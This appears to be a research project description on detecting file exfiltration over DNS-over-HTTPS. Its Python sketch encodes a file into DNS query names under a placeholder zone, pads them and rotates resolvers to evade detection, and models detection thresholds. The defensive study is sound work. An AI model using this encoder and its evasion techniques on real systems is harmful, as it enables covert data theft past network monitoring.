The purpose of this project is to assess how well defenders can detect file exfiltration over DNS-over-HTTPS (DoH), and which evasion strategies attackers can use against them. To that end, it provides a reproducible toolkit to generate, intercept and analyze DoH exfiltration traffic, and compares Machine Learning and threshold-based detection under adversarial scenarios. The originality of this project lies in an end-to-end, containerized pipeline that generates configurable file exfiltration over DoH, controlled by several parameters (e.g., chunking, encoding, padding, resolver rotation). The pipeline reconstructs the exfiltrated file on the resolver side and extracts flow-level features using a fork of DoHLyzer. Its prediction stage trains machine learning models on public labelled datasets and then evaluates them side by side with threshold-based detection methods against malicious and evasive DoH traffic. Specifically, we train Random Forest, Gradient Boosting and Logistic Regression classifiers on a public DoH dataset and benchmark them against evasive DoH exfiltration scenarios. The toolkit orchestrates traffic generation, file capture, feature extraction, model training and analysis, and is packaged as several Docker containers for easy setup and full reproducibility regardless of the host platform. Future work will validate the results on mixed enterprise traffic, extend protocol coverage to HTTP/3 (QUIC) requests, add benign traffic generation, and support real-time traffic evaluation. A key objective is to quantify when stealth constraints make DoH exfiltration uneconomical and no longer worthwhile for the attacker.
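As a rough illustration of the generation parameters listed above (chunking, encoding, padding, resolver rotation) and of resolver-side reconstruction, the sketch below encodes a file into DNS query names, wraps each query as an RFC 8484 DoH GET request, and reassembles the chunks. It is a minimal sketch under stated assumptions, not the toolkit's implementation: the zone `exfil.example.com`, the resolver URLs, the function names (`encode_chunk`, `plan_exfiltration`, `reassemble`), the sequence-number label and the `'0'` padding scheme are all hypothetical. It only builds URLs and sends nothing over the network.

```python
import base64
import itertools
import struct

# Hypothetical, illustrative values; the toolkit's real configuration may differ.
EXFIL_ZONE = "exfil.example.com"  # placeholder attacker-controlled zone
RESOLVERS = [                      # placeholder DoH endpoints, rotated round-robin
    "https://doh-a.example/dns-query",
    "https://doh-b.example/dns-query",
]


def encode_chunk(seq: int, chunk: bytes, pad_to: int = 0) -> str:
    """Encode one chunk as a query name: <seq>.<base32 labels>.<zone>."""
    # Base32 survives DNS case-insensitivity; drop '=' padding and lowercase it.
    payload = base64.b32encode(chunk).decode("ascii").rstrip("=").lower()
    # Optional padding with '0' (outside the base32 alphabet) so that
    # every payload has the same length on the wire.
    payload = payload.ljust(pad_to, "0")
    # DNS labels are limited to 63 bytes and full names to 253 characters.
    labels = [payload[i:i + 63] for i in range(0, len(payload), 63)]
    qname = ".".join([str(seq), *labels, EXFIL_ZONE])
    if len(qname) > 253:
        raise ValueError("query name too long; reduce chunk_size or pad_to")
    return qname


def dns_query_wire(qname: str, qtype: int = 16) -> bytes:
    """Build a minimal DNS query message (default QTYPE 16 = TXT, QCLASS IN)."""
    # Header: ID 0 (RFC 8484 recommends 0 for cache friendliness), RD flag, 1 question.
    header = struct.pack("!HHHHHH", 0, 0x0100, 1, 0, 0, 0)
    name = b"".join(
        bytes([len(label)]) + label.encode("ascii") for label in qname.split(".")
    )
    return header + name + b"\x00" + struct.pack("!HH", qtype, 1)


def plan_exfiltration(data: bytes, chunk_size: int = 30, pad_to: int = 0):
    """Yield (DoH GET URL, query name) pairs, rotating resolvers round-robin."""
    resolvers = itertools.cycle(RESOLVERS)
    for seq, start in enumerate(range(0, len(data), chunk_size)):
        qname = encode_chunk(seq, data[start:start + chunk_size], pad_to)
        # RFC 8484 GET: base64url-encoded DNS message without '=' padding.
        wire = dns_query_wire(qname)
        dns_param = base64.urlsafe_b64encode(wire).rstrip(b"=").decode("ascii")
        yield f"{next(resolvers)}?dns={dns_param}", qname


def reassemble(qnames, zone: str = EXFIL_ZONE) -> bytes:
    """Receiver-side reconstruction: order chunks by sequence number and decode."""
    parts = {}
    for name in qnames:
        labels = name[: -(len(zone) + 1)].split(".")  # strip ".<zone>"
        seq, payload = int(labels[0]), "".join(labels[1:])
        payload = payload.rstrip("0").upper()  # remove '0' padding
        payload += "=" * (-len(payload) % 8)   # restore base32 '=' padding
        parts[seq] = base64.b32decode(payload)
    return b"".join(parts[i] for i in sorted(parts))


if __name__ == "__main__":
    secret = b"contents of a sensitive file " * 4
    plan = list(plan_exfiltration(secret, chunk_size=30, pad_to=60))
    for url, _ in plan[:2]:
        print(url)
    # Queries may arrive out of order, so reassembly sorts by sequence number.
    assert reassemble(reversed([q for _, q in plan])) == secret
```

Padding every payload to a fixed length makes the query names nearly uniform in size (only the sequence label varies), which blunts length-based features, while round-robin rotation spreads the requests across several resolver flows.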
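The trade-off between a threshold-based detector and an evasive attacker, and the question of when stealth constraints make DoH exfiltration uneconomical, can be made concrete with a small calculation. The sketch assumes a hypothetical per-flow summary (`FlowStats`) and two placeholder thresholds (request rate and mean request size); these are not DoHLyzer's feature names or the project's tuned values, and the Machine Learning classifiers are not reproduced here. It also assumes that the detector scores each resolver flow independently.

```python
import math
from dataclasses import dataclass


@dataclass
class FlowStats:
    """Hypothetical per-flow summary (not DoHLyzer's actual feature set)."""
    duration_s: float
    n_requests: int
    bytes_out: int

    @property
    def request_rate(self) -> float:
        # Zero-duration flows are treated as infinitely fast.
        return self.n_requests / self.duration_s if self.duration_s > 0 else float("inf")

    @property
    def mean_request_bytes(self) -> float:
        return self.bytes_out / self.n_requests if self.n_requests else 0.0


def threshold_detect(flow: FlowStats, max_rate: float = 2.0,
                     max_request_bytes: float = 150.0) -> bool:
    """Flag a flow that is too chatty or whose requests are unusually large.

    Both thresholds are illustrative placeholders, not values from the project.
    """
    return flow.request_rate > max_rate or flow.mean_request_bytes > max_request_bytes


def min_exfil_seconds(file_size: int, chunk_size: int, max_rate: float,
                      n_resolvers: int = 1) -> float:
    """Approximate minimum time for an attacker keeping every flow at or below max_rate.

    Assumes the detector scores each resolver flow independently, so rotating
    across n_resolvers multiplies the attacker's usable request budget.
    """
    n_queries = math.ceil(file_size / chunk_size)
    return n_queries / (max_rate * n_resolvers)


if __name__ == "__main__":
    burst = FlowStats(duration_s=10, n_requests=200, bytes_out=200 * 180)
    slow = FlowStats(duration_s=600, n_requests=600, bytes_out=600 * 120)
    print(threshold_detect(burst), threshold_detect(slow))  # True False
    one_mib = 1024 * 1024
    print(min_exfil_seconds(one_mib, 30, max_rate=2.0))                 # 17476.5
    print(min_exfil_seconds(one_mib, 30, max_rate=2.0, n_resolvers=2))  # 8738.25
```

Under these assumptions, a 1 MiB file sent in 30-byte chunks needs 34,953 queries: about 4.9 hours at 2 requests per second on a single flow, and half that when rotating across two resolvers. Tightening the thresholds stretches this time further, which is the kind of cost the project aims to quantify.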